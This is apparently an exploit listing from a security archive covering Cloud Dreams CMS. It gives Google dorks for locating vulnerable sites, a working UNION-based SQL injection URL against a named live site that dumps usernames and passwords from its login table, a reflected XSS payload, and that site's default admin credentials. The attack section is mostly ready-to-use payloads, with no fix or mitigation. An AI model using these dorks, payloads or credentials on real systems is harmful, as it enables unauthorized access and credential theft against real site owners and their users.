Cloud Dreams CMS - SQL Injection + XSS + Week Admin Password Vulnerability

2018.01.30
ir The Shadow Walkers (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:" Web Design Company - Clouddreams " inurl:.php?id=

# Exploit Title: Cloud Dreams CMS - SQL Injection + XSS + Week Admin Password Vulnerability # Google Dork 1: intext:" Web Design Company - Clouddreams " inurl:.php?id= # Google Dork 2: intext:" Developed By Cloud Dreams" # Date: 2018-01-30 # Exploit Author: The Shadow Walkers # Discovered By: Astra (motawari@tutanota.com) # Vendor Homepage: http://clouddreams.in/ # Software Link: - # Version: 1.0 # Tested on: Kali Linux # CVE : - --------------------------------------------------------- SQL injection: http://www.uniqlinens.in/details.php?proid=76[SQLi] http://www.uniqlinens.in/details.php?proid=-76%27+Union+SeleCT+1,Group_ConCat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14+From+login--+ - XSS: http://www.uniqlinens.in/index.php?msg=%3Cscript%3Ealert(/Astra/)%3C/script%3E&type=error - Admin Week Password: http://www.uniqlinens.in/admin user:admin password:admin ------------------------------------------------------------------- # Astra - Ghostman - N37iD # https://t.me/TheShadowWalkers # Iranian Undrground Researchers


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top